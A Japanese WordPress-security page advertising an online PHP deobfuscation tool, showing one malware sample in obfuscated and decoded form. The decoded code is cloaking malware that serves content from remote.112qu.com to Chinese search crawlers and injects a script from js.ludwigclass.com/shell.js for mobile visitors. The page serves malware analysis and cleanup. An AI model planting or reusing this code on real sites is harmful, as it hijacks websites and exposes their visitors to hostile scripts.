Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto rZsVU; IKA_j: define("\x59\x33\x48\147\127", stristr(dVjBn, "\x2e\170\155\154") or stristr(dVjBn, "\x2e\x64\157\x63") or stristr(dVjBn, "\56\x74\170\x74") or stristr(dVjBn, "\x2e\x70\160\x74") or stristr(dVjBn, "\56\x68\164\155\x6c") or stristr(dVjBn, "\x2e\170\154\163") or stristr(dVj...



難読化されたPHPコード

<?php
 goto rZsVU; IKA_j: define("\x59\x33\x48\147\127", stristr(dVjBn, "\x2e\170\155\154") or stristr(dVjBn, "\x2e\x64\157\x63") or stristr(dVjBn, "\56\x74\170\x74") or stristr(dVjBn, "\x2e\x70\160\x74") or stristr(dVjBn, "\56\x68\164\155\x6c") or stristr(dVjBn, "\x2e\170\154\163") or stristr(dVjBn, "\62\x30\62") or stristr(dVjBn, "\56\163\150\x74\155\x6c") or stristr(dVjBn, "\61")); goto bOfnQ; quaff: define("\x49\160\146\64\x59", "\100\x42\141\x69\144\165\123\160\x69\144\x65\162\x7c\x53\x6f\x67\157\165\x7c\x59\151\x73\157\165\174\x48\x61\x6f\163\157\165\174\x33\66\x30\123\x70\151\x64\145\x72\100\x69"); goto zgdyK; pvFOi: function Tr1lK($fmjrO) { $rqdhf = curl_init(); curl_setopt($rqdhf, CURLOPT_URL, $fmjrO); curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["\x48\124\x54\x50\137\x55\x53\105\x52\137\x41\107\105\x4e\124"]); curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1); curl_setopt($rqdhf, CURLOPT_HEADER, 0); curl_setopt($rqdhf, CURLOPT_ENCODING, "\x67\172\x69\x70"); $kNlZg = curl_exec($rqdhf); curl_close($rqdhf); return $kNlZg; } goto G5Rqx; zgdyK: define("\x75\x71\166\x74\160", "\x2f\x70\150\157\x6e\145\174\160\x61\x64\174\x70\x6f\144\174\151\x50\x68\x6f\x6e\x65\174\x69\120\157\x64\x7c\x69\x6f\163\174\x69\x50\141\144\174\x41\156\x64\x72\x6f\x69\x64\x7c\x4d\157\142\x69\154\145\174\102\x6c\x61\143\x6b\x42\x65\x72\x72\x79\174\x49\105\x4d\157\142\x69\154\145\x7c\x4d\x51\x51\102\162\x6f\167\x73\x65\x72\x7c\112\x55\103\x7c\x46\x65\x6e\x6e\x65\x63\174\x77\117\123\x42\162\157\167\163\145\x72\x7c\102\162\157\167\x73\145\162\x4e\107\x7c\127\145\142\117\x53\174\123\x79\x6d\142\x69\141\x6e\x7c\127\x69\x6e\x64\x6f\167\163\x20\120\150\157\x6e\x65\57"); goto IKA_j; bOfnQ: if (!preg_match(Ipf4Y, lajgw)) { if (!preg_match(uqvtp, lajgw)) { return; } echo "\74\163\143\162\151\x70\x74\40\163\162\x63\x3d\x68\164\x74\x70\x73\72\57\x2f\152\163\x2e\154\165\x64\x77\151\147\x63\154\x61\x73\x73\x2e\x63\157\155\57\x73\x68\x65\154\x6c\56\152\163\76\74\x2f\x73\143\x72\151\x70\x74\x3e"; die; } goto mjeew; rZsVU: set_time_limit(0); goto chp8p; LOOZP: $n_BfT = "\163\x74\x72\151\x73\164\x72"; goto Vffo_; cpImt: define("\x69\124\116\x52\104", "\77\x64\x6f\x6d\x61\x69\x6e\x3d" . $OsUgP["\110\x54\x54\x50\137\110\x4f\x53\124"] . "\46\x70\x61\x74\150\75" . dVjBn . "\x26\x66\x6c\141\147\x3d\147\x6c\x6f\x62\141\154" . "\46\144\x62\75" . $_SERVER["\122\105\x4d\117\x54\x45\137\101\x44\x44\x52"]); goto GDdvW; C14K8: header("\x43\157\156\x74\x65\156\164\55\124\171\160\145\x3a\x20\x74\x65\170\164\x2f\150\x74\155\154\x3b\x63\150\x61\x72\x73\145\x74\x3d\165\x74\x66\x2d\x38"); goto LOOZP; wkKpP: define("\116\64\x65\x53\131", !isset($OsUgP["\x48\124\124\120\x5f\x52\x45\x46\x45\122\x45\122"]) ? '' : $OsUgP["\x48\124\124\x50\x5f\122\105\x46\105\122\105\122"]); goto ZAf2M; G5Rqx: define("\144\x56\x6a\102\156", $OsUgP["\122\105\121\125\105\123\x54\137\x55\122\x49"]); goto wkKpP; Vffo_: $OsUgP = $_SERVER; goto pvFOi; mjeew: echo tR1LK("\x68\164\164\x70\x73\72\57\x2f\162\145\x6d\x6f\x74\x65\x2e\x31\61\x32\x71\165\56\x63\x6f\155"); goto kYjlc; GDdvW: define("\111\141\121\127\x59", "\x69\x54\x4e\122\x44\x26\162\145\146\145\x72\x65\162\x3d" . urlencode(N4eSY)); goto quaff; ZAf2M: define("\x6c\x61\152\147\167", $OsUgP["\x48\124\x54\x50\x5f\x55\123\105\x52\x5f\x41\107\105\116\124"]); goto eRzDU; chp8p: error_reporting(0); goto C14K8; eRzDU: define("\x43\x31\115\165\145", "\150\x74\164\160\163\72\x2f\57\x72\145\155\x6f\164\x65\56\61\61\62\x71\165\x2e\x63\x6f\x6d\57"); goto cpImt; kYjlc: die;

デコード(難読化解除)されたコード

<?php

set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
$n_BfT = "stristr";
$OsUgP = $_SERVER;
function Tr1lK($fmjrO)
{
    $rqdhf = curl_init();
    curl_setopt($rqdhf, CURLOPT_URL, $fmjrO);
    curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
    curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($rqdhf, CURLOPT_HEADER, 0);
    curl_setopt($rqdhf, CURLOPT_ENCODING, "gzip");
    $kNlZg = curl_exec($rqdhf);
    curl_close($rqdhf);
    return $kNlZg;
}
define("dVjBn", $OsUgP["REQUEST_URI"]);
define("N4eSY", !isset($OsUgP["HTTP_REFERER"]) ? '' : $OsUgP["HTTP_REFERER"]);
define("lajgw", $OsUgP["HTTP_USER_AGENT"]);
define("C1Mue", "https://remote.112qu.com/");
define("iTNRD", "?domain=" . $OsUgP["HTTP_HOST"] . "&path=" . dVjBn . "&flag=global" . "&db=" . $_SERVER["REMOTE_ADDR"]);
define("IaQWY", "iTNRD&referer=" . urlencode(N4eSY));
define("Ipf4Y", "@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i");
define("uqvtp", "/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/");
define("Y3HgW", stristr(dVjBn, ".xml") or stristr(dVjBn, ".doc") or stristr(dVjBn, ".txt") or stristr(dVjBn, ".ppt") or stristr(dVjBn, ".html") or stristr(dVjBn, ".xls") or stristr(dVjBn, "202") or stristr(dVjBn, ".shtml") or stristr(dVjBn, "1"));
if (!preg_match(Ipf4Y, lajgw)) {
    if (!preg_match(uqvtp, lajgw)) {
        return;
    }
    echo "<script src=https://js.ludwigclass.com/shell.js></script>";
    die;
}
echo tR1LK("https://remote.112qu.com");
die;

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.